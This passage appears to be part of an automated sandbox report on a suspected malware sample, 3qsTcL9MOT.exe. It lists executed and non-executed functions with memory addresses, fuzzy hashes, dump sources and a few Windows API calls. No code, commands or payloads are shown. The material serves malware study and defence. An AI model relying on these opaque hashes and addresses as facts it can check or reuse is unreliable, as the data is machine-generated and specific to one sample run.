Opcode Fuzzy Hash: 13978e97ed4321b49b9e03dd332149abf38a4d932c028a8ae70f8ba4c7225237
Instruction Fuzzy Hash: 74210271100204DFDB05DF58D9C0B66BF69FB88718F20C17DEA091A256C73AE806C7E1

Function 013CD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058346328.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13cd000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b072b94728dfe8c13c6e9d065791f68047ac7f074e4894ec1fda0aa12a8e2682
Instruction ID: 9af20bad539193d78c4856436c4ac632541eceb05b857d8f22f195c7b9649a4f
Opcode Fuzzy Hash: b072b94728dfe8c13c6e9d065791f68047ac7f074e4894ec1fda0aa12a8e2682
Instruction Fuzzy Hash: AD21E072500244DFDB05DF58D980B26BF69FB98718F20857DE9090A256C33AD816CBE2

Function 013ED01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058430056.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13ed000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99e82ec9863aeaa8f9542028b4baad39967e223cb3e3d6095e90a08d899b6456
Instruction ID: fe666e1d6e69055f31a1184a770f14cf24b8f7932fb2276491c2974aa461008f
Opcode Fuzzy Hash: 99e82ec9863aeaa8f9542028b4baad39967e223cb3e3d6095e90a08d899b6456
Instruction Fuzzy Hash: 80212571504304DFCB15DF68D988B16BFA5FB84318F28C56DD90A0B396C33AD807CA61

Function 013ED1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058430056.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13ed000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b69087fd3dd3576446f3aad1e1e3e1aacf2cea044e9b59ca8359f22f64390dd
Instruction ID: f2a540a3f130827acfa8483371ae3c449f4a150aedf79516d2d343d522e76c54
Opcode Fuzzy Hash: 2b69087fd3dd3576446f3aad1e1e3e1aacf2cea044e9b59ca8359f22f64390dd
Instruction Fuzzy Hash: E321F575504304DFDB05DFA8D5C8B26BBA5FB84328F20C56DD9094B296C33AD406CA61

Function 013CD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058346328.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13cd000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: f2ffcc70b4e4c94f94507ee17fa93528331b2c5d8531092b7894fc48b748b9e9
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 0F11DF76404280CFCB02CF54D9C4B16BF71FB98718F24C6ADE9490B256C336D85ACBA2

Function 013CD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058346328.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13cd000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 552bb52206dd55e9d394dd3edebcf0aeac0606c10ebbaadf89f6abdb6c6c596c
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 4111CD72404240DFDB02CF44D9C4B56BF61FB84224F24C6ADEA090A256C33AE85ACBA2

Function 013ED1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058430056.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13ed000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 137eb759371ab7ec83835755ad17763fbe91044e933cf50bd298af0a460a8a7e
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: FD11BB75504380DFDB02CF54C5C8B15BFB1FB84228F24C6A9D8494B296C33AD40ACB62

Function 013ED017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058430056.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13ed000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 068fa82824a53e5b71f9760d527de906d78409c7e3e7eddf2aad7ebbe4683578
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: E011D075504380CFDB12CF54D5C8B15FFA1FB44318F28C6A9D8494B696C33AD80ACB62

Function 013CD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058346328.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13cd000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ec2bb375fc2a34161a12da64dc60b12e84ae47e402f264dd5014fc25e8f6620
Instruction ID: a2bfe50b8a94f87d5d11a9927e1ba4f6e23f7ad9c9c267b75784c664332a6aa7
Opcode Fuzzy Hash: 3ec2bb375fc2a34161a12da64dc60b12e84ae47e402f264dd5014fc25e8f6620
Instruction Fuzzy Hash: 1201F7710043849AE7209E99CD84B66BF9CEF45728F18C53EFD090A686C2399C41CBF1

Function 013CD744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058346328.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13cd000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea158a6299aebe87d85c3ecf630c129291915ccfb3a30ffee8573d9cc854f9cb
Instruction ID: cdc8aef2ec983ebe0142b5da10f04190ac5327a1d56b0d6bb6467ecfe68de871
Opcode Fuzzy Hash: ea158a6299aebe87d85c3ecf630c129291915ccfb3a30ffee8573d9cc854f9cb
Instruction Fuzzy Hash: 82F06271404384AEE7118E1AD888B62FF98EF55738F18C56AFD484A286C2799844CBB1

Non-executed Functions

Function 079CB570 Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62241fd00ca6ab2f775c0ee7483ba53900ee24d56c9bd3025ac5b68db32171e4
Instruction ID: aca79368dc8b165cebd5bf4261312222853e1cd037d6cec8835c6c21a1a8c00e
Opcode Fuzzy Hash: 62241fd00ca6ab2f775c0ee7483ba53900ee24d56c9bd3025ac5b68db32171e4
Instruction Fuzzy Hash: 1ED19FF17007018FDB19DB7AC551BAE77EAAFC9608F18846DD14A8B7A0CB35E901CB52

Function 03350040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060101418.0000000003350000.00000040.00000800.00020000.00000000.sdmp, Offset: 03350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3350000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62b47d4f2cdb1f9bab71a3d39ce5a4177b18312a8d4fff41417359f9a18f5ad9
Instruction ID: a31e4d5844510946dea0d4211e4bbe24995f06ed41c0f5c4d4df792f422fe4aa
Opcode Fuzzy Hash: 62b47d4f2cdb1f9bab71a3d39ce5a4177b18312a8d4fff41417359f9a18f5ad9
Instruction Fuzzy Hash: EE12B7F84017468BD318EF65EC4C1897BB7BB8A328F508219D2652F2E9D7B415CACF64

Function 079C65C8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b989416b39343a088b610f9d4685fb31840c30f251cac4d4898cf50c9c7a8d5
Instruction ID: aa55dc7074ae4fb354d9ee6bb03f1a96a3f90e3b433db33bd4ed2f81e6bcd1ba
Opcode Fuzzy Hash: 2b989416b39343a088b610f9d4685fb31840c30f251cac4d4898cf50c9c7a8d5
Instruction Fuzzy Hash: 5FE1E7B4E002198FDB14DFA9C9809AEFBB6FF89345F248269D414AB356D730AD41CF61

Function 079C4DC8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a4aedf2d5ae2d4b04580739cce6ce62305426a872aa7075fd88e2927a71272f
Instruction ID: 41993669b0c68be1a6309259697d140d63f33cb595534e23c26b9882e54c6615
Opcode Fuzzy Hash: 3a4aedf2d5ae2d4b04580739cce6ce62305426a872aa7075fd88e2927a71272f
Instruction Fuzzy Hash: 4EE107B4E002198FDB14DFA8C9809AEFBB6FF89305F24C269D414AB356D730A941CF61

Function 079C4558 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daf24c2d7dfd5aabd872337ee3ae24bca7fb8d57a2de73e1bdd9f73cc7473918
Instruction ID: 7f2feb7f65c531556f70ec45cd619217efaf490e37831dd65ce1a93e0332fd53
Opcode Fuzzy Hash: daf24c2d7dfd5aabd872337ee3ae24bca7fb8d57a2de73e1bdd9f73cc7473918
Instruction Fuzzy Hash: 98E108B4E002598FDB14DFA8C9909AEFBB6FF89305F248269D414AB356D730AD41CF61

Function 079C8370 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a47603e2e025316364a66996442e24fff04f70bb28b51e7b92b54bb28905029
Instruction ID: 45d88e2f008b5f12e3d8cd50bfe08f28974c190defa14a9acc45d4f9801f24aa
Opcode Fuzzy Hash: 8a47603e2e025316364a66996442e24fff04f70bb28b51e7b92b54bb28905029
Instruction Fuzzy Hash: 07E1FAB4E002198FDB14DFA9C9809AEFBB6FF89305F248269D414AB356D731AD41CF61

Function 079C4990 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6029d3ac31650b06d54f29e5804dd2311a6501d0f942b01cce3fc1c4d6357496
Instruction ID: 229f3aad3e02013a816af08c70db33b85f8cab948894f054aa66383892a33936
Opcode Fuzzy Hash: 6029d3ac31650b06d54f29e5804dd2311a6501d0f942b01cce3fc1c4d6357496
Instruction Fuzzy Hash: 64E108B4E002598FDB14DFA8C9909AEFBB6FF89305F248269D414AB356C730AD41CF61

Function 0147DEEC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058625166.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1470000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae473e59a41f4f1367dd665c4b92b227fcec1a02b8bdfa8e00131f788c3037d3
Instruction ID: 3b86d25c79fa6ac83c1e107dede5934e0733c19699b8da072a041cba6de8c7ba
Opcode Fuzzy Hash: ae473e59a41f4f1367dd665c4b92b227fcec1a02b8bdfa8e00131f788c3037d3
Instruction Fuzzy Hash: 0CA19036E102068FCF09DFB9C8444DEBBB2FF99300B15856EE915AB265DB31D946CB40

Function 03350006 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060101418.0000000003350000.00000040.00000800.00020000.00000000.sdmp, Offset: 03350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3350000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63476c66be4c6cd152fd070b1cfb6813c313937a0030191afa98f7972c8b4f49
Instruction ID: 447a5dbb37a5f7b2894df5dbaa2c34511e9ee75d4fc2e64cc686b2063504a006
Opcode Fuzzy Hash: 63476c66be4c6cd152fd070b1cfb6813c313937a0030191afa98f7972c8b4f49
Instruction Fuzzy Hash: 89D129B84007468FD719EF64EC481897BB6FF8B328F548219D1616B2E9DBB414CACF64

Function 079C65B7 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070658516.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79c0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a169910815691a1c5e7ec37119f2cc317b4bcdc59de6b2dd9a53020d324d1f40
Instruction ID: 428fcb84b1119329eb673fa4f769af3113fb089ab9a922d16a108f7c8cddeeba
Opcode Fuzzy Hash: a169910815691a1c5e7ec37119f2cc317b4bcdc59de6b2dd9a53020d324d1f40
Instruction Fuzzy Hash: B3512CB4E002198BDB14DFA9C9805AEFBF6FF89304F24C16AD418A7355D7349941CFA1

Function 033541A4 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060101418.0000000003350000.00000040.00000800.00020000.00000000.sdmp, Offset: 03350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3350000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d74fc5497fb40ada36596aebaf0ca1f422518506962175a8915039aa25fb523
Instruction ID: a1d9b4579637961500059e548955b72c30f94e39ba8626f291ce48c32596fa8d
Opcode Fuzzy Hash: 8d74fc5497fb40ada36596aebaf0ca1f422518506962175a8915039aa25fb523
Instruction Fuzzy Hash: 402180BB8192818FCB06CF34ECD06913B71AF5B31638E09D7C448DF566D222A956CB91

Analysis Process: 3qsTcL9MOT.exePID: 4816, Parent PID: 1868COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	5.3%
Signature Coverage:	8.4%
Total number of Nodes:	131
Total number of Limit Nodes:	10

Executed Functions

Function 0042C4C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(DIB,?,780157A5,?,?,00424944,?,35262E7A,?,?,?,?,?,?,00000000,B783F5B3), ref: 0042C4F7

Strings

DIB, xrefs: 0042C4EE, 0042C4F6

Memory Dump Source

Source File: 00000003.00000002.2291195440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_3qsTcL9MOT.jbxd

Yara matches

Similarity

API ID: Close
String ID: DIB
API String ID: 3535843008-834349310
Opcode ID: 3d1c18abf690c68af00b4f598ef74a1842629c4662bdc5406d3ab33d1fc998b6
Instruction ID: a0408b79ca532d9f785201a0887e32feba4ce8b153a048926c007b3dc49f498c
Opcode Fuzzy Hash: 3d1c18abf690c68af00b4f598ef74a1842629c4662bdc5406d3ab33d1fc998b6
Instruction Fuzzy Hash: 9CE04F352102147BD520FA5ADC01F97B76CEFC5714F00402AFA0867242C674BA1187E4

Function 004176A3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417715

Memory Dump Source

Source File: 00000003.00000002.2291195440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_3qsTcL9MOT.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: d20514dbed541711f06c5f50188ee8c907cd2a4cac65204c9f39392a3faeb9f2
Instruction ID: 655561f7b42f22fd5511ab722963629276e900804c73589df0456ccc95ce4742
Opcode Fuzzy Hash: d20514dbed541711f06c5f50188ee8c907cd2a4cac65204c9f39392a3faeb9f2
Instruction Fuzzy Hash: 090175B5E0020DABDF10DBE5DC42FDEB7789B54308F4041A6E90897240F635EB598B55

Function 01052B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01052B6A

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2d98ecf426a0067fc6dd25b39c831091943ad133a95e6e4dcf2d6e2e60f356a6
Instruction ID: d737fd3380421eb5d08c2c783d4e58ee5c78ff2e0529cdd53a1fd26495f7ff54
Opcode Fuzzy Hash: 2d98ecf426a0067fc6dd25b39c831091943ad133a95e6e4dcf2d6e2e60f356a6
Instruction Fuzzy Hash: 589002B12025000351057158841461A400E97E0201B55C022E5414590DC52589916225

Function 01052DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01052DFA

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 61e17b97c6b63987dacd273c9a687ac791b5d70ab7b81e4da4eb5b1899462b18
Instruction ID: eb249eeb24479089632b5d725758b86f09f2c9ccb826e5f24c676ce559a09c19
Opcode Fuzzy Hash: 61e17b97c6b63987dacd273c9a687ac791b5d70ab7b81e4da4eb5b1899462b18
Instruction Fuzzy Hash: 2790027120150413E1117158850470B000D97D0241F95C413A4824558DD6568A52A221

Function 01052C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01052C7A

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 73d272d7335d1182a2cbd558f4144b8dc977f5c513dd8b0ee962390414dcd136
Instruction ID: 92de694c9e9b6133db135cd61d34511add8113cb14b06e017181d568aa353d32
Opcode Fuzzy Hash: 73d272d7335d1182a2cbd558f4144b8dc977f5c513dd8b0ee962390414dcd136
Instruction Fuzzy Hash: 9990027120158802E1107158C40474E000997D0301F59C412A8824658DC69589917221

Function 010535C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 010535CA

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 78ad8e819bcde0e13102bb260a44b54de53752a7a7d689dfe0a25f81794d79a0
Instruction ID: 1de1848c147d3820c1081a185db8e7bbd2e160c6197a4d5712a12667ff670a3f
Opcode Fuzzy Hash: 78ad8e819bcde0e13102bb260a44b54de53752a7a7d689dfe0a25f81794d79a0
Instruction Fuzzy Hash: D790027160560402E1007158851470A100997D0201F65C412A4824568DC7958A5166A2

Function 00413ED3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(q3a81SS,00000111,00000000,00000000), ref: 00413F4A

Strings

q3a81SS, xrefs: 00413F51, 00413F54
q3a81SS, xrefs: 00413F3F, 00413F49, 00413F5A

Memory Dump Source

Source File: 00000003.00000002.2291195440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_3qsTcL9MOT.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: q3a81SS$q3a81SS
API String ID: 1836367815-3972413748
Opcode ID: 761977f19e5b31266b88ac5b7620eab298a27fd4c7408419746127e231c959a9
Instruction ID: e5719b48394cd5b23321d5c39a8b94e67c60dd6515a4ea93f28de9b14b443bdf
Opcode Fuzzy Hash: 761977f19e5b31266b88ac5b7620eab298a27fd4c7408419746127e231c959a9
Instruction Fuzzy Hash: 7901D672D0121C7ADB00AAE69C81DEF7B7CDF41798F048069FA14A7141D6785F0687A9

Function 0042C7D3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00000000,?,00000000,?,?,0042494F,?), ref: 0042C80F

Strings

OIB, xrefs: 0042C7D7, 0042C7F8

Memory Dump Source

Source File: 00000003.00000002.2291195440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_3qsTcL9MOT.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: OIB
API String ID: 1279760036-1039058719
Opcode ID: 866ad238b9475ed576715e4d4bc55d68e1c652e5d4aff164c9ce62ae2b67d712
Instruction ID: 64f7500e0aefcda8489cb7304fd757640c76f8965bafc5e5f72b1ce7af980fe5
Opcode Fuzzy Hash: 866ad238b9475ed576715e4d4bc55d68e1c652e5d4aff164c9ce62ae2b67d712
Instruction Fuzzy Hash: 82E06D722007047BC610EE59DC45F9B33ACEFC8710F004019FA09A7281D674B9108BB8

Function 0042C823 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,C103CA33,00000007,00000000,00000004,00000000,00416F1C,000000F4), ref: 0042C85C

Memory Dump Source

Source File: 00000003.00000002.2291195440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_3qsTcL9MOT.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4fc3ec8936f6b1931ceba89b590bfce49c52afe1fdc88f053dc06a18979b8893
Instruction ID: a73e3b6872fe73949bf9cc72bbbd870a964e6841ef135330afd6eab9bdc47a97
Opcode Fuzzy Hash: 4fc3ec8936f6b1931ceba89b590bfce49c52afe1fdc88f053dc06a18979b8893
Instruction Fuzzy Hash: 11E06D72600204BBD620EF89DC41E9B73ACDFC8710F004029FA08A7241C675B9118AB4

Function 0042C863 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,E21A8BFC,?,?,E21A8BFC), ref: 0042C89A

Memory Dump Source

Source File: 00000003.00000002.2291195440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_3qsTcL9MOT.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 471a9c42635f0d09d50a005600461ca87487b9b48d0727ce6fa3b58ce348e680
Instruction ID: 4803e7fac674c7fec7ffa91ebfcd202b6ac4156625856eac4fe34165d05bb13c
Opcode Fuzzy Hash: 471a9c42635f0d09d50a005600461ca87487b9b48d0727ce6fa3b58ce348e680
Instruction Fuzzy Hash: 77E04676214214BBD620BB6ADC01F9BB7ACDFCA714F00442AFB0CA7241C670BA118AF4

Function 01052C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01052C24

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6944b43121295d54f8731a656cd16e7cc55da7c185ad1c9c9c74deab6fd0f56c
Instruction ID: 9cd64cdc25ced82c0dcf1a48b3e5546e7cde67a075881a1cb05936c76589ce8c
Opcode Fuzzy Hash: 6944b43121295d54f8731a656cd16e7cc55da7c185ad1c9c9c74deab6fd0f56c
Instruction Fuzzy Hash: 06B09B719015C5C5EB51E764460871B7D447BD0701F15C062D6430641F4738C1D1E275

Non-executed Functions

Function 01092349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

Initializing the application verifier package failed with status 0x%08lx, xrefs: 01093176
GlobalFlag, xrefs: 01092F3F, 01093059
MinimumStackCommitInBytes, xrefs: 01092BB0
MaxLoaderThreads, xrefs: 010924EC
@, xrefs: 01092B74
TracingFlags, xrefs: 01092549
minkernel\ntdll\ldrinit.c, xrefs: 01093187
CFGOptions, xrefs: 01092967
DisableExceptionChainValidation, xrefs: 0109275F
ExecuteOptions, xrefs: 010925A0
GlobalFlag2, xrefs: 01092FC0
LdrpInitializeExecutionOptions, xrefs: 0109317D
ShutdownFlags, xrefs: 010924A1
DisableHeapLookaside, xrefs: 0109246D
@, xrefs: 01092942
RaiseExceptionOnPossibleDeadlock, xrefs: 01092579
UnloadEventTraceDepth, xrefs: 010924C0
FrontEndHeapDebugOptions, xrefs: 01092489
UseImpersonatedDeviceMap, xrefs: 0109251C
MaxDeadActivationContexts, xrefs: 01092D82

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 9cf62d752fe8bc31fbd13e36b849e5037825aeffbb886f6e38886ff5f6aecbad
